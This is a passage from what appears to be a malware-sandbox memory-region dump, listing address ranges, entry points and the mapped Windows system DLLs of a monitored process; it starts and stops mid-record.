0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 685 start_va = 0x7ffa0bbe0000 end_va = 0x7ffa0bc8dfff monitored = 0 entry_point = 0x7ffa0bbf80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 686 start_va = 0x7ffa0be20000 end_va = 0x7ffa0bebffff monitored = 0 entry_point = 0x7ffa0be90910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 687 start_va = 0x7ffa0bec0000 end_va = 0x7ffa0bfe0fff monitored = 0 entry_point = 0x7ffa0bec1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 688 start_va = 0x7ffa0c170000 end_va = 0x7ffa0c1bdfff monitored = 0 entry_point = 0x7ffa0c181ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 689 start_va = 0x7ffa0c1f0000 end_va = 0x7ffa0c212fff monitored = 0 entry_point = 0x7ffa0c1f99a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 690 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 691 start_va = 0x7ffa0c8f0000 end_va = 0x7ffa0c990fff monitored = 0 entry_point = 0x7ffa0c8f3db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 692 start_va = 0x7ffa0c9a0000 end_va = 0x7ffa0c9b3fff monitored = 0 entry_point = 0x7ffa0c9a50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 693 start_va = 0x7ffa0c9c0000 end_va = 0x7ffa0ca2ffff monitored = 0 entry_point = 0x7ffa0c9e2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 694 start_va = 0x7ffa0cc80000 end_va = 0x7ffa0ce3cfff monitored = 0 entry_point = 0x7ffa0ccaaf90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 695 start_va = 0x7ffa0ce40000 end_va = 0x7ffa0d1c1fff monitored = 0 entry_point = 0x7ffa0ce91220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 696 start_va = 0x7ffa0e210000 end_va = 0x7ffa0e2b8fff monitored = 0 entry_point = 0x7ffa0e239010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 697 start_va = 0x7ffa0e2c0000 end_va = 0x7ffa0e3cdfff monitored = 0 entry_point = 0x7ffa0e30eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 698 start_va = 0x7ffa0e3d0000 end_va = 0x7ffa0e439fff monitored = 0 entry_point = 0x7ffa0e3d9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 699 start_va = 0x7ffa0e480000 end_va = 0x7ffa0e4f6fff monitored = 0 entry_point = 0x7ffa0e482af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 700 start_va = 0x7ffa0e500000 end_va = 0x7ffa0e597fff monitored = 0 entry_point = 0x7ffa0e523980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 701 start_va = 0x7ffa0e5a0000 end_va = 0x7ffa0e63ffff monitored = 0 entry_point = 0x7ffa0e5c56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 702 start_va = 0x7ffa0e640000 end_va = 0x7ffa0e6c1fff monitored = 0 entry_point = 0x7ffa0e644ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 703 start_va = 0x7ffa0e6d0000 end_va = 0x7ffa0e724fff monitored = 0 entry_point = 0x7ffa0e6d3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 704 start_va = 0x7ffa0e7d0000 end_va = 0x7ffa0e849fff monitored = 0 entry_point = 0x7ffa0e7f7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 705 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 706 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 707 start_va = 0x7ffa0ead0000 end_va = 0x7ffa0eb10fff monitored = 0 entry_point = 0x7ffa0ead4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 708 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 709 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 710 start_va = 0x7ffa0ee30000 end_va = 0x7ffa0ee90fff monitored = 0 entry_point = 0x7ffa0ee34b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 711 start_va = 0x7ffa0f190000 end_va = 0x7ffa0f221fff monitored = 0 entry_point = 0x7ffa0f1da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 712 start_va = 0x7ffa0f330000 end_va = 0x7ffa0f364fff monitored = 0 entry_point = 0x7ffa0f333cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 713 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 714 start_va = 0x7ffa0f470000 end_va = 0x7ffa0f9b4fff monitored = 0 entry_point = 0x7ffa0f60a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 715 start_va = 0x7ffa0f9c0000 end_va = 0x7ffa0fc2efff monitored = 0 entry_point = 0x7ffa0fa722b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 716 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 717 start_va = 0x7ffa100a0000 end_va = 0x7ffa100eafff monitored = 0 entry_point = 0x7ffa100b72b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 718 start_va = 0x7ffa100f0000 end_va = 0x7ffa102a0fff monitored = 0 entry_point = 0x7ffa101861a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 719 start_va = 0x7ffa102b0000 end_va = 0x7ffa10351fff monitored = 0 entry_point = 0x7ffa102d0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 720 start_va = 0x7ffa10360000 end_va = 0x7ffa10607fff monitored = 0 entry_point = 0x7ffa103f3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 721 start_va = 0x7ffa10610000 end_va = 0x7ffa10631fff monitored = 0 entry_point = 0x7ffa10611a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 722 start_va = 0x7ffa10660000 end_va = 0x7ffa1071dfff monitored = 0 entry_point = 0x7ffa106a2d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 723 start_va = 0x7ffa10720000 end_va = 0x7ffa10802fff monitored = 0 entry_point = 0x7ffa10757da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 724 start_va = 0x7ffa10b20000 end_va = 0x7ffa10b7cfff monitored = 0 entry_point = 0x7ffa10b26c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 725 start_va = 0x7ffa10b80000 end_va = 0x7ffa10bd0fff monitored = 0 entry_point = 0x7ffa10b825e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 726 start_va = 0x7ffa10be0000 end_va = 0x7ffa10c1ffff monitored = 0 entry_point = 0x7ffa10bf3750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 727 start_va = 0x7ffa10c80000 end_va = 0x7ffa10cb2fff monitored = 0 entry_point = 0x7ffa10c83800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 728 start_va = 0x7ffa10cc0000 end_va = 0x7ffa11152fff monitored = 0 entry_point = 0x7ffa10ccf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 729 start_va = 0x7ffa11160000 end_va = 0x7ffa111c6fff monitored = 0 entry_point = 0x7ffa1117e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 730 start_va = 0x7ffa111d0000 end_va = 0x7ffa1121efff monitored = 0 entry_point = 0x7ffa111d7ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 731 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 732 start_va = 0x7ffa113b0000 end_va = 0x7ffa113cbfff monitored = 0 entry_point = 0x7ffa113b37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 733 start_va = 0x7ffa113e0000 end_va = 0x7ffa1140dfff monitored = 0 entry_point = 0x7ffa113e6580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 734 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 735 start_va = 0x7ffa11430000 end_va = 0x7ffa11454fff monitored = 0 entry_point = 0x7ffa11432300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 736 start_va = 0x7ffa11490000 end_va = 0x7ffa114b4fff monitored = 0 entry_point = 0x7ffa114a5220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 737 start_va = 0x7ffa114c0000 end_va = 0x7ffa114c9fff monitored = 0 entry_point = 0x7ffa114c1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 738 start_va = 0x7ffa114d0000 end_va = 0x7ffa114d9fff monitored = 0 entry_point = 0x7ffa114d2e50 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 739 start_va = 0x7ffa114e0000 end_va = 0x7ffa114f4fff monitored = 0 entry_point = 0x7ffa114e2850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 740 start_va = 0x7ffa11500000 end_va = 0x7ffa1153bfff monitored = 0 entry_point = 0x7ffa115025e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 741 start_va = 0x7ffa11580000 end_va = 0x7ffa115f8fff monitored = 0 entry_point = 0x7ffa1159fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 742 start_va = 0x7ffa11710000 end_va = 0x7ffa117a5fff monitored = 0 entry_point = 0x7ffa11735570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 743 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 744 start_va = 0x7ffa118b0000 end_va = 0x7ffa119affff monitored = 0 entry_point = 0x7ffa118f0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 745 start_va = 0x7ffa11b50000 end_va = 0x7ffa11b79fff monitored = 0 entry_point = 0x7ffa11b58b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 746 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 747 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 748 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 749 start_va = 0x7ffa123e0000 end_va = 0x7ffa123e9fff monitored = 0 entry_point = 0x7ffa123e1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 750 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 751 start_va = 0x7ffa12710000 end_va = 0x7ffa12726fff monitored = 0 entry_point = 0x7ffa127179d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 752 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 753 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 754 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 755 start_va = 0x7ffa12c50000 end_va = 0x7ffa12ce8fff monitored = 0 entry_point = 0x7ffa12c7f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 756 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 757 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 758 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 759 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 760 start_va = 0x7ffa12e20000 end_va = 0x7ffa12e74fff monitored = 0 entry_point = 0x7ffa12e37970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 761 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 762 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 763 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 764 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 765 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 766 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 767 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 768 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 769 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 770 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 771 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 772 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 773 start_va = 0x7ffa141e0000 end_va = 0x7ffa1421afff monitored = 0 entry_point = 0x7ffa141e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 774 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 775 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 776 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 777 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 778 start_va = 0x7ffa14750000 end_va = 0x7ffa147befff monitored = 0 entry_point = 0x7ffa14775f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 779 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 780 start_va = 0x7ffa14a40000 end_va = 0x7ffa14b99fff monitored = 0 entry_point = 0x7ffa14a838e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 781 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 782 start_va = 0x7ffa14c00000 end_va = 0x7ffa15028fff monitored = 0 entry_point = 0x7ffa14c28740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 783 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 784 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 785 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 786 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 787 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 789 start_va = 0x3d20000 end_va = 0x3d35fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d20000" filename = "" Region: id = 790 start_va = 0x10170000 end_va = 0x101effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010170000" filename = "" Region: id = 791 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 792 start_va = 0x4980000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 793 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 794 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 795 start_va = 0x101f0000 end_va = 0x1026ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101f0000" filename = "" Region: id = 796 start_va = 0x10270000 end_va = 0x102effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010270000" filename = "" Region: id = 797 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 798 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 799 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 800 start_va = 0x1e90000 end_va = 